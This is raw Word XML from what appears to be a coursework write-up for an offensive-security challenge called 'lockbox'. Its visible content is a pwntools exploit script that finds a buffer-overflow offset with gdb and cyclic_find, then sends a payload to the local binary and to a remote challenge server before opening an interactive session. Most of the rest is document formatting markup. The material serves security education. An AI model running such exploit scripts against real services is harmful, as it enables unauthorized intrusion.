            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("Breakpoint")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B514FE1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recvuntil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("(gdb) ")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39724E78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 xml:space="preserve">("info registers </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>eax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7139225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ln = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cleanLine</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>p.recv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37E842A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lastRenderedPageBreak/>
              <w:tab/>
              <w:t>print(ln)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64518D5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l = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>re.split</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("\s+", ln)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27A7C41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d = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>re.split</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("x", l[1])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A1B0B8F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>n = 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A975F4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a = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>d[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C2F7AC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r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>byt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> = [a[</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i:i</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>+n</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">] for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> in range(0, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(a), n)]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="148585BA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bytes = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>b"</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>".join</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>struct.pack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("B", int("0x"+byt[</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">], 16)) for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> in range(0,4))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6167DFD9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>print(str(bytes))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6903794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r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>eax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> = bytes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45504C6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r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>eOffset</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cyclic_find</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>eax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3490847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gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>info(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>eax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> offset = %d", </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>eOffset</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="273733D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close</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BCC415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35F404C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6D67C2B2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def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>sendPld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):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40A50B4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p </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>=  process</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>('/bin/bash')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16AF13F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'gdb ./lockbox -q')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="559E9F49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"break * 0x00000000004011ce")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41518D3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"r")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70A3145A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d = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>p.recvuntil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("&gt;")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B50A25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r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pld</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>secretPld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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F703E12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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pld</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3009EBF1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interactive</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07AD4742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1D936620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def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>testRun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):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AC1A77A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p </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>=  process</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>('./lockbox')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3242C298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d = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>p.recvuntil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("&gt;")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="463021C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r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pld</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>secretPld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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F8D947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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pld</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="358618D0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interactive</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7472AD24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6E692627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 Host and port for the remote challenge</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52E98B8C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HOST = 'offsec-chalbroker.osiris.cyber.nyu.edu'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="649B4A8E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PORT = 1336</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34881B7A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6492F4C1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 xml:space="preserve">def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>remoteTest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):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74C47D5B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p = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>remote(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HOST, PORT)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="310A05D1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  <w:t xml:space="preserve">d = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>p.recvuntil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>("&gt;")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="688E0335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r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pld</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>secretPld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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B1DF1C1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sendline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pld</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36D0495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ab/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>p.interactive</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F9B3CDD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</w:p>
          <w:p w14:paraId="317AE073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proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>remoteTest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5201607C" w14:textId="77777777" w:rsidR="00200143" w:rsidRPr="00200143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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>sendPld(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B99CBB6" w14:textId="19DF648B" w:rsidR="0062558E" w:rsidRPr="00E23C61" w:rsidRDefault="00200143" w:rsidP="00200143">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>testRun(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00200143">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70D98A19" w14:textId="4D1AB586" w:rsidR="00C677DB" w:rsidRDefault="00C677DB" w:rsidP="00200143"/>
    <w:sectPr w:rsidR="00C677DB" w:rsidSect="00996A5D">
      <w:headerReference w:type="default" r:id="rId14"/>
      <w:footerReference w:type="defaul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A5B6C" w14:textId="77777777" w:rsidR="00996A5D" w:rsidRDefault="00996A5D" w:rsidP="003719FB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="11FF1B22" w14:textId="77777777" w:rsidR="00996A5D" w:rsidRDefault="00996A5D" w:rsidP="0037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7710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0BE8A" w14:textId="089F4E6E" w:rsidR="003719FB" w:rsidRDefault="00371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4A178" w14:textId="4746AEE7" w:rsidR="003719FB" w:rsidRDefault="003719FB" w:rsidP="00371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0B59C" w14:textId="77777777" w:rsidR="00996A5D" w:rsidRDefault="00996A5D" w:rsidP="003719FB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1AF5F20B" w14:textId="77777777" w:rsidR="00996A5D" w:rsidRDefault="00996A5D" w:rsidP="0037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D09C" w14:textId="35A353DF" w:rsidR="00D139EB" w:rsidRDefault="00D139EB">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>02/</w:t>
    </w:r>
    <w:r w:rsidR="00433718">
      <w:t>28</w:t>
    </w:r>
    <w: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071"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="038EDD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D7C9E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FCDAEABE"/>
    <w:lvl w:ilvl="0" w:tplc="3222C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61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4B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E4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0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C8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E7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EDA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E3CA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C5B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F62A26C"/>
    <w:lvl w:ilvl="0" w:tplc="1D6E5BCC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1532628A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="DF7414D2" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0CA448D4" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="6E22819E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="32069BF2" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="28BE60FE" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="63C62592" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C50A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2542"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2ACE924C"/>
    <w:lvl w:ilvl="0" w:tplc="32CE8E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76054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594628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1D641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72524B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9CECB3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CABAE86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89286BBA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3E1E3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1121DAE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="933C0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D62"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="426ED74A"/>
    <w:lvl w:ilvl="0" w:tplc="32B83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4B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AA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47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C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88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6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EA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8C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2AC8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="08D2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4DC3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ADA4F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B3513D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AD9A59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F17730F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B9767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7FC3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7A2431F0"/>
    <w:lvl w:ilvl="0" w:tplc="A1BC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8E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C8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A0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45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80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6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AE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E6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A27D6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="08D2D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3CCC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="48263EE2"/>
    <w:lvl w:ilvl="0" w:tplc="FAD08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AC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88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23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6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E5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44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2E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C1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0606"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="648A89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6691C74"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A7E4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697C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA4CE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D09C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8084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B751F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA4C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74738"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0558678A"/>
    <w:lvl w:ilvl="0" w:tplc="5CFA43EA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C5108018">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="9FAC28D4" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="C016AA4C" w:tentative="1">
      <w:start w:val="1"/>
